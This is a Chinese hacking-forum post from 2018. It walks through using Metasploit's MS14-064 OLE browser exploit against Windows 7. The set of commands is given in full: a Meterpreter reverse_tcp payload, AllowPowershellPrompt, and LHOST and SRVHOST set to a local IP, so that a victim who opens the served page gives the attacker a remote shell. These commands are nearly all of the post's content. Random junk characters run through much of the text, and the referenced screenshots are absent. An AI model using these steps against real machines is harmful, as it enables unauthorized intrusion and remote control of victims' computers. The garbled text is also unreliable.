找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1424|回复: 0
打印 上一主题 下一主题

MS14-064 漏洞测试入侵win7

[复制链接]
跳转到指定楼层
楼主
发表于 2018-10-20 20:20:35 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

9 V7 P Z1 E/ `* ?1 j4 T3 }2 e 我发现msf下的exp只能针对带有powershell的机器进行攻击,我们用如下方法来搞演示: U& X C* K$ W6 g4 D

. N; w9 U& N& \6 J5 f

, v5 _; \1 d s5 G" A* h, ?; e 开启msf执行命令use exploits/windows/browser/ms14_064_ole_code_execution如图: 5 L0 F/ A3 }" L1 R( H, o

7 C. O* X- h# q8 q, w

( K' c" q% b+ ^ 然后执行命令 set PAYLOAD windows/meterpreter/reverse_tcp ! ]* l* x! {5 o$ d, @# |( w5 @: Q' @

, X9 T5 d& j3 |! J1 r! b1 ]9 Z

* k/ C/ ~) |" m2 @. H             set AllowPowershellPrompt true ! S# \% P8 V# R* f/ B6 n

" [- o7 a, b$ b: l5 |

) M6 @8 k/ T6 `. y$ X4 l2 w" t; ]0 U8 W             Set LHOST 192.168.0.109 ( d' X3 s! F) F. v+ F) S

7 ]0 g; c& T9 {+ n, @8 F7 e- I

" A6 h( Y4 @+ g. u" @/ `" W1 P             set SRVHOST 192.168.0.109 9 F. y' V( K; U3 u4 r- ]( `

7 b( ?4 Y4 s) a1 K) n7 T

' T' p% }2 ~3 R& P6 X$ u, w             Set uripath share1 ]5 S! E( g. B

' P/ P* G) U9 H& v) p$ _1 Z: Y2 D) F4 m

. Z/ ]7 w8 D: H6 X             Set srvport 80: ^# s$ A- S5 R* z- ^! T% R8 m

) s9 i' T. ]! u

% F, k9 Q' O5 s   # K0 H) t! I: u3 P4 d' |7 Y. D

/ b$ s# [) l$ Y. J! e

& \) k( R/ _5 S# c$ ~  7 w, Q- e; F% s4 z D

: R* [% K$ ` O2 z7 L2 [

* O! R1 d7 a5 M9 e. u$ r   ) j% I& v4 m1 p4 U

6 Z2 m# M! p# r c5 K7 t( ^

% o! P0 N" e$ o# W2 M: Q) \  3 D8 r" o) J/ Z

9 H) W# H) z. g, }* [( N

* p) D3 K4 O) I' i }. D  7 p; Z r- L! }/ c- e+ j

3 l- f$ z- \" W8 Z3 q

* }4 w& _# s: i' {% E/ o/ [ 下面我们来访问本地地址如图: " P, }! W" q1 a7 L3 q

$ g) A$ I; {0 U$ A; V6 y+ K) u

) n; `# Y+ p4 c+ w   ) \1 M) Z8 e5 n2 H- A, S% K

+ n& \& I4 a8 s- [5 h( z! Y8 a- h% s2 X

8 y' i3 c. i$ H3 I1 P0 ~  3 k9 ]8 Q+ f D9 M

2 h, x9 @; w# h/ h$ o: _4 Q

' g5 c1 [3 @7 n0 x- G8 Y8 n. p& R & r+ V; \ u. F! x' I8 j! `6 f+ ~! ^% X

回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表